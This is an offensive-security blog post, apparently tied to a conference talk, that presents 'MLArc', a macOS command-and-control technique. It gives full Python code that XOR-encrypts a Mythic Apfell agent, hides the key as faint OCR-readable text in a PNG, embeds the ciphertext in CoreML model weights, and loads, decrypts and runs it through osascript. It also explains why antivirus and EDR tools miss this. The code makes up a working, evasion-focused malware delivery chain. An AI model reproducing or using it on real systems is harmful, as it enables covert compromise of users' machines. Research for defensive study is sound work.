Weaponizing Apple AI for Offensive Operations - Part I

Hxr1

19 Sep 2025 • 9 min read

This blog series introduces MLArc, a standalone command-and-control framework that operates entirely through Apple’s AI stack. Unlike conventional C2 systems that rely on JSON over HTTP, script interpreters, or DLL injection, MLArc uses AI artifacts as the transport layer. Commands are delivered inside .mlmodel files, decryption keys are hidden in plain sight inside Vision-OCR images, and results can be returned in model metadata or even covertly encoded into audio waveforms via AVFoundation.

In Part 1, we’ll build the foundation: an overview of Apple’s AI stack, a technical breakdown of CoreML and Vision, and a detailed walk-through of embedding an Apfell payload into model weight arrays. In Part 2, we’ll extend the attack surface further by abusing AVFoundation as a covert channel and demonstrate how MLArc uses these techniques to create a fully functional C2 workflow one that masquerades entirely as normal AI activity.

Apple AI Stack Overview

Apple has spent the last decade building a vertically integrated AI ecosystem. Unlike frameworks like TensorFlow or PyTorch, which often run on servers, Apple’s AI is designed to run on-device for privacy and speed. This means models, inference engines, and helper APIs all execute within the user’s trust boundary macOS, iOS, and watchOS.

From a developer’s perspective, this stack looks like a convenient set of APIs. From an attacker’s perspective, it’s an unmonitored path into execution.

CoreML Engine

Purpose: CoreML is Apple’s runtime for executing machine learning models locally.
Format: Models are stored in .mlmodel files (protobuf-based). These are compiled into .mlmodelc by coremlc or Xcode.
Execution: Models are loaded via MLModel(contentsOf:) or VNCoreMLModel(), and run on Apple’s Neural Engine (ANE), GPU, or CPU.
Structure of a .mlmodel:
- ModelDescription: defines input/output types and shapes.
- ModelType: architecture backend (e.g., neural network, tree ensemble).
- Layers: each with serialized parameters (e.g., convolution kernels, fully connected matrices).
- Metadata: open userDefined dictionary for arbitrary developer notes.
Security assumption:
- .mlmodel files are not signed.
- Gatekeeper, notarization, and XProtect do not verify their contents.
- Apple assumes that an app trusted to load a model also implicitly trusts the model file.

For attackers, this is the first gap: a binary blob that can carry arbitrary data, parsed only by Apple’s own runtime, with no AV/EDR inspection.

Vision Framework

Purpose: Provides high-level computer vision features: text recognition, barcode scanning, face detection, and object localization.
Integration: Vision wraps CoreML, meaning developers can plug models into Vision pipelines for OCR, image classification, etc.
API surface:
- VNImageRequestHandler: provides pixel buffers.
- VNRecognizeTextRequest: OCR request that returns VNRecognizedTextObservation.
- Other APIs: face tracking, object bounding boxes, barcode parsing.
Execution model: Vision consumes raw pixel buffers (CGImage, CIImage, CMSampleBuffer). It does not parse metadata like EXIF — it literally looks at pixel values.
Security assumption: Apple assumes OCR is “safe” because it only produces strings. There is no validation that those strings could be secrets (keys, tokens, instructions).

For attackers, Vision becomes a covert key oracle: hide keys inside faint text and let Apple’s OCR deliver them invisibly.

AVFoundation

Purpose: Low-level multimedia framework powering nearly every audio/video feature on macOS/iOS.
Capabilities:
- Audio/video playback (AVPlayer).
- Audio capture and real-time processing (AVAudioEngine).
- Access to PCM buffers (AVAudioPCMBuffer).
- Encoding and export (AVAssetExportSession).
Integration: Works with higher-level APIs like Photos, Music, FaceTime, Podcasts.
Security assumption: Audio and video are treated as passive data streams. Apple does not expect adversaries to encode structured payloads inside waveform amplitudes.

For attackers, AVFoundation provides a steganographic covert channel. By encoding payloads into amplitude variations at high frequency, we can deliver data that looks like ordinary .wav files.

Other AI-Adjacent Frameworks

RealityKit: body tracking and AR object detection.
SoundAnalysis: wraps AVFoundation to provide audio classification (speech, music, environmental sounds).
Siri & Spotlight: prediction APIs powered by CoreML models.

While these can also be abused, our research focused on the big three: CoreML, Vision, and AVFoundation. Together, they form a triangle of model (weights) + image (keys) + audio (commands) — all Apple-signed, all unmonitored.

Why Defenders Overlook This Stack

AI artifacts are not treated as executables.
- .mlmodel = “data file,” not code.
- .png = “image,” not a secret store.
- .wav = “sound,” not a command channel.
Gatekeeper & notarization only cover binaries.
- Apple never signs or validates .mlmodel.
- Sandbox rules focus on app permissions, not model contents.
EDRs don’t implement Apple’s private schemas.
- No off-the-shelf scanner parses Model.proto.
- No detection logic exists for OCR-based key extraction.
- Audio payloads are indistinguishable from normal media.
Every API we abuse is Apple-signed.
- CoreML loads the model.
- Vision extracts the key.
- AVFoundation reconstructs payload strings.
- osascript executes them.

This chain looks like “normal Apple activity” — which is exactly why it works.

That blind spot makes Apple’s AI stack an attractive staging ground for offensive operations. In our Black Hat briefing, we demonstrated how to embed Mythic’s Apfell agent inside .mlmodel weights, hide keys in images for extraction via Vision OCR, and even encode payloads into audio amplitudes using AVFoundation. Taken together, these techniques allow the creation of a stealthy C2 channel - MLArc - that hides in plain sight by abusing trusted AI workflows.

This blog post expands on that research in detail. We’ll break down how Apple’s AI stack works under the hood, show exactly how we stage and execute payloads inside it, and walk through the code that makes it possible.

CoreML as a Payload Container

Apple’s CoreML format (.mlmodel) is not a black box. It’s a Protocol Buffer schema (Model.proto) compiled into a serialized binary. Every .mlmodel you load is parsed by the CoreML.framework, which expects specific message types:

Model → top-level object
ModelDescription → defines input/output shapes and datatypes
NeuralNetwork → container for layer graphs
NeuralNetworkLayer → each layer has a name, type, parameters
WeightParams → float arrays representing weights/biases

For example, a single innerProduct layer might look like this in proto (simplified):

message NeuralNetworkLayer {
  string name = 1;
  oneof layerType {
    InnerProductLayerParams innerProduct = 3;
    ConvolutionLayerParams convolution = 4;
    ...
  }
}

message InnerProductLayerParams {
  WeightParams weights = 1;
  WeightParams bias = 2;
}

message WeightParams {
  repeated float floatValue = 10;
}

The floatValue array is just a repeated field of float32. CoreML never checks that these floats correspond to meaningful weights and it assumes they came from a trained model. This is our injection vector.

Embedding a Payload

Let’s say we want to hide an Apfell JavaScript payload (apfell.js) inside a model. We do this in three steps:

Encrypt the payload:
XOR encryption ensures that even if someone dumps the weights, they won’t see raw JS.

def xor_encrypt(data, key):
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])

Recast into floats:
After XOR, we treat each byte as a float32.

import numpy as np
encrypted = xor_encrypt(open("apfell.js","rb").read(), "my_secret_key")
float_array = np.frombuffer(encrypted, dtype=np.uint8).astype(np.float32)

Now we have an array like:

[102.0, 13.0, 200.0, 44.0, ...]

Inject into .mlmodel:
Using coremltools, we open an existing .mlmodel and replace a layer’s weights:

import coremltools as ct
spec = ct.utils.load_spec("base_model.mlmodel")
for layer in spec.neuralNetwork.layers:
    if layer.name == "payload_layer":
        layer.innerProduct.weights.floatValue[:] = float_array
ct.utils.save_spec(spec, "malicious_model_weights.mlmodel")

At this point, the model compiles and loads without complaint. Nothing in Apple’s runtime checks that floatValue represents a convolution kernel versus an encrypted shellcode blob.

Why EDR Misses This

If an AV tool scans the file, all it sees is protobuf bytes like:

0a 0f 70 61 79 6c 6f 61 64 5f 6c 61 79 65 72 10 ...
12 8a 01 0d cd cc cc 3d 0d 00 00 48 42 ...

Unless the tool actually implements Apple’s Model.proto, parses the floats, and then detects that the distribution is non-random, it cannot know this is malicious. Every other part of the .mlmodel still describes a valid feedforward network.

Apple’s own assumption — “AI models are just data” — becomes the attacker’s advantage.

Embedding Apfell into a CoreML `.mlmodel`

The key idea is that a .mlmodel file is just a serialized protobuf with structured fields. Inside, neuralNetwork.layers contain weight arrays (float32 values). We can overwrite one of those arrays with an encrypted Apfell payload.

Here’s the end-to-end process:

Step 1: Encrypt the Apfell Payload

We take the apfell.js payload and XOR-encrypt it with a key.



def xor_encrypt(data, key):
    """
    Encrypts data using XOR with the given key.
    """
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])

if __name__ == "__main__":
    payload_path = "/Users/hari/Desktop/CoreML/Apfell/apfell.js"  # Original payload
    xor_key = "my_secret_key"  # XOR key
    output_encrypted_path = "/Users/hari/Desktop/CoreML/Apfell/encoded_payload.txt"  # Save path for encoded payload

    # Read the payload in binary mode
    with open(payload_path, "rb") as file:
        payload = file.read()

    # Encrypt the payload
    encrypted_payload = xor_encrypt(payload, xor_key)

    # Save the encrypted payload as text
    with open(output_encrypted_path, "wb") as file:
        file.write(encrypted_payload)

    print(f"[INFO] Encrypted payload saved to {output_encrypted_path}")

Step 2: Generate Key embedding in to Pixel of the image

from PIL import Image, ImageDraw, ImageFont

def embed_xor_key_in_image(key, image_path):
    """
    Embeds the XOR key as faint text in an image.
    """
    width, height = 300, 300
    image = Image.new("RGB", (width, height), "white")
    draw = ImageDraw.Draw(image)

    # Font settings
    try:
        font = ImageFont.truetype("/System/Library/Fonts/Supplemental/Courier New.ttf", size=14)
    except:
        font = ImageFont.load_default()

    # Embed the key as faint text
    faint_color = (200, 200, 200)
    draw.text((10, 10), key, font=font, fill=faint_color)

    # Save the image
    image.save(image_path, "PNG")
    print(f"[INFO] XOR key embedded and saved to {image_path}")

if __name__ == "__main__":
    key = "my_secret_key"
    image_path = "/Users/hari/Desktop/CoreML/Apfell/xor_key_image.png"

    embed_xor_key_in_image(key, image_path)

Step 3: Inject Into `.mlmodel`

import coremltools
import numpy as np
from coremltools.models.neural_network import NeuralNetworkBuilder
from coremltools.models.datatypes import Array

def embed_payload_in_model(encoded_payload_path, model_path):
    """
    Embeds an XOR-encoded payload into a CoreML model's weights.
    """
    # Read the XOR-encoded payload as binary
    with open(encoded_payload_path, "rb") as file:
        encoded_payload = file.read()

    # Convert the payload to numerical format
    payload_array = np.array(list(encoded_payload), dtype=np.float32)

    # Define input and output features with dynamic size based on payload length
    input_size = len(payload_array)
    input_features = [("input", Array(input_size))]
    output_features = [("output", Array(1))]

    # Build the CoreML model
    builder = NeuralNetworkBuilder(input_features, output_features)

    # Add a layer to embed the payload in weights
    builder.add_inner_product(
        name="payload_layer",
        W=payload_array.reshape(-1, input_size),  # Reshape payload to match input size
        b=None,
        input_channels=input_size,
        output_channels=1,
        has_bias=False,
        input_name="input",
        output_name="output"
    )
    print("[INFO] Payload embedded in model weights.")

    # Save the model
    mlmodel = coremltools.models.MLModel(builder.spec)
    mlmodel.save(model_path)
    print(f"[INFO] Malicious CoreML model saved to {model_path}")

if __name__ == "__main__":
    encoded_payload_path = "/Users/hari/Desktop/CoreML/Apfell/encoded_payload.txt"
    model_path = "/Users/hari/Desktop/CoreML/Apfell/malicious_model_weights.mlmodel"

    embed_payload_in_model(encoded_payload_path, model_path)

The result is a fully valid .mlmodel file. It will compile with coremlc and load with MLModel(contentsOf:) without errors.

How It Looks on Disk

If we inspect the protobuf at the byte level, we’ll see something like:

layer {
  name: "payload_layer"
  innerProduct {
    weights {
      floatValue: 72.0
      floatValue: 101.0
      floatValue: 108.0
      ...
    }
  }
}

To CoreML, these are just float weights. To us, they’re an encrypted Apfell agent.

Step 4: Extraction and Execution

On the target, we reverse the process:

Load .mlmodel with coremltools or MLModel.
Locate payload_layer and grab its floatValue[].
Convert floats back to integers.
Decrypt with OCR-extracted key.
Execute with osascript.

import coremltools
import numpy as np
import os
import subprocess
import Vision
import Foundation
import tempfile

def extract_key_with_vision(image_path):
    """
    Extracts the XOR key from an image using Vision Framework.
    """
    try:
        image_url = Foundation.NSURL.fileURLWithPath_(image_path)
        request_handler = Vision.VNImageRequestHandler.alloc().initWithURL_options_(image_url, None)
        extracted_text = []

        def handle_text_request(request, error):
            if error:
                print(f"[ERROR] Vision Framework error: {error}")
                return
            for result in request.results():
                if isinstance(result, Vision.VNRecognizedTextObservation):
                    for candidate in result.topCandidates_(1):
                        extracted_text.append(candidate.string())

        text_request = Vision.VNRecognizeTextRequest.alloc().initWithCompletionHandler_(handle_text_request)
        success, error = request_handler.performRequests_error_([text_request], None)
        if not success:
            print(f"[ERROR] Failed to perform text recognition request: {error}")
            return None

        if not extracted_text:
            raise ValueError("No text recognized in the image.")
        return extracted_text[0]
    except Exception as e:
        print(f"[ERROR] Failed to extract XOR key: {e}")
        return None

def xor_decrypt(data, key):
    """
    Decrypts data using XOR with the given key.
    """
    key_bytes = key.encode("utf-8")
    return bytes([b ^ key_bytes[i % len(key_bytes)] for i, b in enumerate(data)])

def execute_payload_using_fd(payload):
    """
    Executes the decrypted payload using a virtual file descriptor.
    """
    try:
        # Create a temporary file-like object in memory
        with tempfile.NamedTemporaryFile("w+", delete=False, suffix=".js") as temp_file:
            temp_file.write(payload.decode("utf-8"))
            temp_file.flush()
            temp_file_path = temp_file.name

        # Debugging: Uncomment this to verify the temporary file content
        # with open(temp_file_path, "r") as f:
        #     print(f"[DEBUG] Payload content in file:\n{f.read()}")

        # Execute the payload using the temporary file
        command = ["osascript", temp_file_path]
        result = subprocess.run(command, capture_output=True, text=True)

        if result.returncode == 0:
            print("[INFO] Payload executed successfully.")
        else:
            print(f"[ERROR] Payload execution failed: {result.stderr}")

    except Exception as e:
        print(f"[ERROR] Failed to execute payload: {e}")
    finally:
        # Ensure the temporary file is deleted
        if os.path.exists(temp_file_path):
            os.remove(temp_file_path)

def extract_and_execute_payload(model_path, image_path):
    """
    Extracts the XOR-encoded payload from the CoreML model, retrieves the XOR key using Vision Framework,
    decrypts the payload, and executes it using a virtual file descriptor.
    """
    try:
        print("[INFO] Extracting XOR key from the image...")
        xor_key = extract_key_with_vision(image_path)
        if not xor_key:
            print("[ERROR] Failed to extract XOR key.")
            return
        print(f"[INFO] XOR key extracted: {xor_key}")

        spec = coremltools.utils.load_spec(model_path)
        for layer in spec.neuralNetwork.layers:
            if layer.name == "payload_layer":
                payload_encrypted = np.array(layer.innerProduct.weights.floatValue, dtype=np.float32)
                payload_encrypted = [int(b) for b in payload_encrypted]

                payload_decrypted = xor_decrypt(payload_encrypted, xor_key)
                if not payload_decrypted:
                    print("[ERROR] Failed to decrypt the payload.")
                    return
                print("[INFO] Payload decrypted successfully.")

                execute_payload_using_fd(payload_decrypted)
                return

        print("[ERROR] Payload layer not found in the model.")
    except Exception as e:
        print(f"[ERROR] Failed to extract, decrypt, or execute payload: {e}")

if __name__ == "__main__":
    model_path = "/Users/hari/Desktop/CoreML/Apfell/malicious_model_weights.mlmodel"
    image_path = "/Users/hari/Desktop/CoreML/Apfell/xor_key_image.png"

    extract_and_execute_payload(model_path, image_path)